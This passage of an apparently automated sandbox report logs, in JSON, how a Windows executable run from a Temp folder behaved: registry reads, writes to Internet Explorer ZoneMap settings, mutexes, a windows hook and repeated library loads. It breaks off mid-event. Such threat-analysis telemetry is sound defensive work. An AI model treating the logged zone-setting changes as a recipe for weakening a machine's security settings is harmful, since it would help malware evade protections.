"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\1", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\2", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\3", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\4", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_URI_DISABLECACHE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_URI_DISABLECACHE", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\\", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1A10", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\AutodialDLL" ], "read_keys": [ "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\SafeProcessSearchMode", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\932", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\949", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\950", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\936", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\CTF\\EnableAnchorContext", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\IsVailContainer", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\ResyncResetTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\MaxResyncAttempts", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\f1ffd3c13b7bd7f498e8.exe", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\*", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1A10", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\AutodialDLL" ], "write_keys": [ "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" ], "delete_keys": [], "executed_commands": [ "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\"" ], "resolved_apis": [], "mutexes": [ "Local\\SM0:9224:168:WilStaging_02", "Local\\MSCTF.Asm.MutexDefault1", "CicLoadWinStaWinSta0", "Local\\MSCTF.CtfMonitorInstMutexDefault1", "Local\\ZonesCacheCounterMutex", "Local\\ZonesLockedCacheCounterMutex", "Local\\SM0:3552:168:WilStaging_02" ], "created_services": [], "started_services": [] }, "enhanced": [ { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,425", "eid": 1, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,425", "eid": 2, "data": { "file": "KERNEL32", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,456", "eid": 3, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,456", "eid": 4, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,456", "eid": 5, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "content": "kernel32.dll" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,456", "eid": 6, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,456", "eid": 7, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,456", "eid": 8, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "content": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,769", "eid": 9, "data": { "file": "C:\\Windows\\System32\\VB6ES.DLL", "pathtofile": null, "moduleaddress": "0x00000000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,769", "eid": 10, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,769", "eid": 11, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,769", "eid": 12, "data": { "file": "C:\\Windows\\system32\\rpcss.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,769", "eid": 13, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,769", "eid": 14, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,769", "eid": 15, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,784", "eid": 16, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,784", "eid": 17, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,784", "eid": 18, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,831", "eid": 19, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,831", "eid": 20, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,831", "eid": 21, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,831", "eid": 22, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,862", "eid": 23, "data": { "file": "C:\\Windows\\System32\\uxtheme.dll", "pathtofile": null, "moduleaddress": "0x74e80000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,862", "eid": 24, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "content": "1" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,862", "eid": 25, "data": { "file": "OLEAUT32.DLL", "pathtofile": null, "moduleaddress": "0x76d90000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,862", "eid": 26, "data": { "file": "oleaut32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,862", "eid": 27, "data": { "file": "ole32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,862", "eid": 28, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\SafeProcessSearchMode", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,909", "eid": 29, "data": { "file": "SXS.DLL", "pathtofile": null, "moduleaddress": "0x739a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,909", "eid": 30, "data": { "file": "USER32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,925", "eid": 31, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,925", "eid": 32, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,925", "eid": 33, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,987", "eid": 34, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\932", "content": "c_932.nls" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,987", "eid": 35, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\949", "content": "c_949.nls" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,987", "eid": 36, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\950", "content": "c_950.nls" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,987", "eid": 37, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\936", "content": "c_936.nls" } }, { "event": "create", "object": "windowshook", "timestamp": "2025-02-27 23:34:13,987", "eid": 38, "data": { "id": "18446744073709551615", "moduleaddress": "0x00000000", "procedureaddress": "0x732400ca", "module": "" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:13,987", "eid": 39, "data": { "file": "user32", "pathtofile": null, "moduleaddress": "0x76610000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:13,987", "eid": 40, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,409", "eid": 41, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,409", "eid": 42, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,409", "eid": 43, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,706", "eid": 44, "data": { "file": "ole32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,706", "eid": 45, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,706", "eid": 46, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,706", "eid": 47, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,722", "eid": 48, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,722", "eid": 49, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,722", "eid": 50, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,816", "eid": 51, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,816", "eid": 52, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,816", "eid": 53, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 54, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 55, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 56, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 57, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 58, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,925", "eid": 59, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 60, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 61, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 62, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 63, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 64, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 65, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 66, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 67, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,941", "eid": 68, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,941", "eid": 69, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,972", "eid": 70, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\CTF\\EnableAnchorContext", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,972", "eid": 71, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": 